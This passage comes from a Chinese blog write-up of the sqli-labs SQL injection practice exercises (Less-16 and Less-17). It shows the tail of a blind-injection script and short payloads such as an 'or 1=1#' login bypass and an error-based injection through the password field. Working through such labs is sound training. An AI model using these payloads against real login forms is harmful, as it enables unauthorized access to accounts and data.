chr(low)</span><br><span class="line"></span><br><span class="line">print(&quot;结果：&#123;&#125;&quot;.format(result.lower()))</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h3><p>构造如下语句进行闭合，查询方法语句跟Less-15一样，脚本注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=admin&quot;)or 1=1#</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h3><p>构造如下语句进行闭合，由于会对uname进行check，所以从passwd注入，并且要输入存在的uname，使用报错注入，查询语句可参考Less-11</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=admin&amp;passwd=admin&#x27;#&amp;submit=Submit</span><br></pre></td></tr></table></figure>


<p><strong>未完待续</strong></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql/" rel="tag"># sql</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
            </div>
            <div class="post-nav-item">
                <a href="/2021/08/18/pwn-buu/" rel="next" title="pwn_buu">
                  pwn_buu <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Co1a</span>
</div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>


  <script src="/%5Bobject%20Object%5D"></script>


<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="/js/third-party/search/local-search.js"></script>




  






  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>




  <script async src="/js/cursor/fireworks.js"></script>




</body>
</html>
